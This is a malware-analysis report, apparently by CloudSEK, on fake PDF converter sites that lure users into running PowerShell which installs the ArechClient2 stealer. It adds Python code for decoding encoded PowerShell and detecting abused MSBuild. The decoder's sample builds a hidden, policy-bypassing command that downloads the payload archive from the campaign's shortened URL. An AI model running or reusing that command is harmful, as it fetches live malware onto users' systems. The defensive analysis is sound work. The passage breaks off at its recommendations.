What looks like a harmless online file conversion could be a trap set by cybercriminals. CloudSEK’s latest investigation uncovers a stealthy malware campaign where fake PDF-to-DOCX converters, mimicking the popular PDFCandy.com, trick users into running malicious PowerShell commands. The endgame? A powerful information stealer that hijacks browser credentials, crypto wallets, and more. Dive into our detailed breakdown of this social engineering scam, its technical anatomy, and how to stay a step ahead of such byte bandits.
Online PDF converters have become essential tools in daily digital workflows. On March 17, 2025, the FBI's Denver field office issued an alert regarding malicious online file converters being used to distribute malware. This prompted CloudSEK's Security Research team to investigate these threats in depth, to understand their mechanisms and develop protective measures.
This report examines an attack involving a malicious PDF-to-DOCX converter that impersonates the legitimate service pdfcandy.com. The threat actors replicated the user interface of the genuine platform and registered look-alike domain names to deceive users. The attack hinges on tricking the victim into running a PowerShell command that installs ArechClient2, a .NET-based information stealer and remote access trojan tracked as part of the SectopRAT family and known for harvesting sensitive data from compromised systems.
Our analysis details the technical aspects of the attack and its indicators of compromise, and provides actionable recommendations to help organizations and individuals protect themselves against this kind of social engineering.
Figures 2 and 3 show the landing and home pages of two identified malicious file conversion websites, both impersonating the legitimate pdfcandy.com service. The fraudulent sites replicate pdfcandy.com's visual identity, including its logo and brand elements, to create a convincing facade. On arrival, users are immediately prompted to upload a PDF file for conversion to Word (.docx) format; the attack starts from a routine file conversion need rather than from anything that looks like a download.
Once the user starts the PDF conversion, the malicious website walks them through a series of social engineering steps designed to manipulate behavior, ending in a fake CAPTCHA check.
This user flow shows that the attackers understand both human psychology and the web conventions users have been trained to trust, such as CAPTCHA prompts and verification steps.
After the fake CAPTCHA, the site instructs the user to open PowerShell and run a command (reproduced in Figure 5, with step-by-step instructions). This is the point where social engineering turns into system compromise: the victim, not an exploit, executes the first stage.
Decoding the command revealed a redirection chain designed to obscure the delivery of the payload. The command first fetches the innocuous-looking shortened URL "https[://]bitly[.]cx[/]SMma", which resolves to "bind-new-connect[.]click/santa/bee". That page, shown in Figure 6, redirects to a second shortened URL, "https[://]bitly[.]cx[/]Www0", which in turn lands on "bind-new-connect[.]click/marmaris/later", the endpoint that actually serves the "adobe.zip" payload. ThreatFox lists "bind-new-connect[.]click" as a known distribution domain for ArechClient, an information stealer in the SectopRAT family. This .NET-based remote access trojan has been active since 2019 and can steal browser credentials, cryptocurrency wallet data and other sensitive information.
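Decoding an encoded PowerShell one-liner of the kind the fake converter presents is mostly mechanical, and the steps are worth automating for triage. The Python below is an added example, not code from the CloudSEK write-up: it locates the -EncodedCommand (or -enc/-ec/-e) argument, base64-decodes it as UTF-16LE (the encoding PowerShell requires for that flag), pulls out the URLs and defangs them for a report. The sample command line is constructed for the example and only fetches the shortened bitly.cx URL named in the report; the surrounding flags and the output path are assumptions, not the campaign's actual command.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed clear-text command for this example.  It only fetches the shortened
# URL named in the report; it is NOT the actual command served by the fake
# converter page, whose full text is not reproduced here.
_CLEAR_TEXT = r"iwr https://bitly.cx/SMma -OutFile $env:TEMP\adobe.zip"

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE encoded script, so the
# sample is encoded the same way a lure page would have to encode it.
SAMPLE_CMDLINE = (
    "powershell.exe -nop -w hidden -ep bypass -enc "
    + base64.b64encode(_CLEAR_TEXT.encode("utf-16le")).decode("ascii")
)

# Longest alias first so "-enc" is not consumed as "-e" followed by junk.
_ENC_FLAG = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
_URL = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the clear-text script behind -EncodedCommand/-enc/-ec/-e, or None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64 / not UTF-16LE: treat as "nothing to decode" rather than crash.
        return None


def extract_urls(text: str) -> List[str]:
    """All http(s) URLs in the decoded script, in order of appearance."""
    return _URL.findall(text)


def defang(url: str) -> str:
    """hxxp / [.] notation so the indicator cannot be clicked by accident."""
    scheme, rest = url.split("://", 1)
    return scheme.replace("http", "hxxp") + "://" + rest.replace(".", "[.]")


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode the command line and return the script plus raw and defanged URLs."""
    decoded = decode_encoded_command(cmdline)
    urls = extract_urls(decoded) if decoded else []
    return {"decoded": decoded, "urls": urls, "defanged": [defang(u) for u in urls]}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The decoder deliberately stops at the first stage: it reports where the command reaches out to, but never follows the shortened URL, because the redirect chain behind it is exactly what you do not want a triage script resolving from an analyst workstation.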
The "adobe.zip" archive was served from 172[.]86[.]115[.]43, an IP address flagged as malicious by multiple security vendors on VirusTotal. SectopRAT is also distributed through other lures, including malvertising via Google Ads and fake application updates, to maximize infection rates.
The contents of "adobe.zip" are shown in Figure 7. The archive extracts to a folder named "SoundBAND" containing the malicious executable "audiobit[.]exe". The full dynamic analysis of the archive is available in the accompanying ANY.RUN sandbox report.
Running "audiobit[.]exe" starts a multi-stage chain: it spawns "cmd[.]exe", which in turn launches "MSBuild[.]exe", the legitimate Microsoft build engine that ships with the .NET Framework, here abused as a living-off-the-land binary to load and execute the ArechClient2 stealer (Figure 9). Because MSBuild.exe is Microsoft-signed and present on most Windows systems, the stealer runs under a trusted process name; the parent-child relationship, not the binary itself, is the useful detection signal.
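The parent-child chain above is what a detection should key on: MSBuild.exe is a legitimate signed binary, but it has no business being launched by cmd.exe underneath an executable running out of a user's temp folder. The Python below is an added example, not CloudSEK's detection content: it builds a process tree from Sysmon Event ID 1-style records and flags a monitored LOLBin whenever any of its ancestors lives in a user-writable directory. The records, pids and the user path are constructed for the example; the image names follow the chain in the report, with a Visual Studio build added as a benign control that must not alert.

```python
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon-style (Event ID 1) process-creation records, reduced to the
# fields the logic needs.  Sample data, not telemetry from the campaign: the pids
# and the user path are made up, the image names follow the chain in the report.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Users\alice\AppData\Local\Temp\SoundBAND\audiobit.exe"},
    {"pid": 3000, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 4000, "ppid": 3000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    # Benign control: Visual Studio building a project from its install location.
    {"pid": 5000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"pid": 6000, "ppid": 5000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
]

# Signed Microsoft binaries that attackers use to run code under a trusted name.
LOLBINS = {"msbuild.exe"}

# Locations an unprivileged user (or a dropper running as that user) can write to.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|temp|programdata)\\",
    re.IGNORECASE,
)


def build_tree(events: List[Dict]) -> Dict[int, Dict]:
    """Index events by pid so parents can be looked up in O(1)."""
    return {e["pid"]: e for e in events}


def ancestry(tree: Dict[int, Dict], pid: int, max_depth: int = 8) -> List[Dict]:
    """Return the process chain from the oldest known ancestor down to pid."""
    chain: List[Dict] = []
    cur = tree.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = tree.get(cur["ppid"])
    chain.reverse()
    return chain


def find_suspicious_lolbin_launches(events: List[Dict], lolbins=LOLBINS) -> List[Dict]:
    """Flag each LOLBin whose ancestry passes through a user-writable path."""
    tree = build_tree(events)
    alerts = []
    for e in events:
        if ntpath.basename(e["image"]).lower() not in lolbins:
            continue
        chain = ancestry(tree, e["pid"])
        # Look at ancestors only (chain[:-1]); the LOLBin itself lives under C:\Windows.
        if any(USER_WRITABLE.search(a["image"]) for a in chain[:-1]):
            alerts.append({
                "pid": e["pid"],
                "chain": [ntpath.basename(a["image"]) for a in chain],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_lolbin_launches(SAMPLE_EVENTS):
        print(f"pid {alert['pid']}: {' -> '.join(alert['chain'])}")
```

Walking the whole ancestry rather than checking only the direct parent matters here: the direct parent of MSBuild.exe is cmd.exe, which is benign on its own, and a rule that only looked one level up would miss the dropper two levels above it.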
To protect against malicious file converters like the one analyzed in this report, organizations and individuals should: